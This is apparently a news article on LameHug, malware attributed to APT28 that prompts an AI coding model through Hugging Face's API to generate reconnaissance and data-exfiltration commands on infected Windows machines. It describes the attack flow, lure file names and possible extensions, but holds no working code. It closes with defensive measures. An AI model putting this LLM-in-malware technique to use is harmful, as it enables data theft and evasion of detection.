A newly discovered malware strain uses a coding-focused AI model to generate custom data-theft commands on the fly.
Ukraine’s national cybersecurity agency (CERT-UA) has identified a new malware family called LameHug, which uses a large language model (LLM) to generate real-time commands for compromising Windows systems. The malware is attributed to the Russian state-linked group APT28, also known as Fancy Bear or STRONTIUM.
Disguised in phishing emails that impersonate government officials, LameHug arrives as a ZIP file containing various loader files. Once executed, it interacts with Hugging Face’s API to access Qwen 2.5-Coder-32B-Instruct, a code-generating LLM created by Alibaba Cloud.
LameHug dynamically prompts the LLM to create system reconnaissance and data theft commands, allowing it to adapt its behavior on compromised machines without relying on static payloads. The commands generated can perform actions such as:
Gathering system details and saving them to info.txt
Recursively locating files in the Documents, Desktop, and Downloads folders
Exfiltrating collected data using SFTP or HTTP POST requests
CERT-UA identified at least three different file names used to deliver LameHug: Attachment.pif, AI_generator_uncensored_Canvas_PRO_v0.9.exe, and image.py. The agency attributes the activity to APT28 with medium confidence and notes that the infrastructure used (e.g., Hugging Face) could make communications harder to detect.
CERT-UA did not confirm whether the AI-generated commands were successfully executed or exfiltrated any data. However, they stated the novelty of using LLMs within malware for adaptive attack execution and the potential difficulty in detecting these behaviors using traditional security methods.
The discovery of LameHug marks one of the first known uses of a large language model to generate system commands within active malware. By prompting an AI model to create attack instructions in real time, the malware avoids using static payloads that traditional defenses are designed to catch. CERT-UA’s findings show how threat actors are beginning to test AI tools like Qwen 2.5 in practical cyber operations, and how this method may complicate detection and response using current security tools.
Qwen 2.5 is an open-source coding LLM developed by Alibaba Cloud. It was likely used for its ability to convert natural language prompts into shell commands and executable scripts, ideal for generating dynamic attack instructions.
LLM-generated commands are created in real time and aren't hardcoded into the malware. This makes it harder for antivirus or static analysis tools to flag them during scans.
Hugging Face’s API acted as the bridge between the malware and the LLM. Because the platform is legitimate and widely used, it may help the malware’s communications blend in with normal traffic.
Yes. The ability to prompt an LLM during an attack could be adapted to automate lateral movement, privilege escalation, or even real-time evasion tactics in different environments.
Defensive strategies may include monitoring outbound connections to LLM APIs, using behavioral detection over signature-based tools, and restricting external script execution on sensitive endpoints.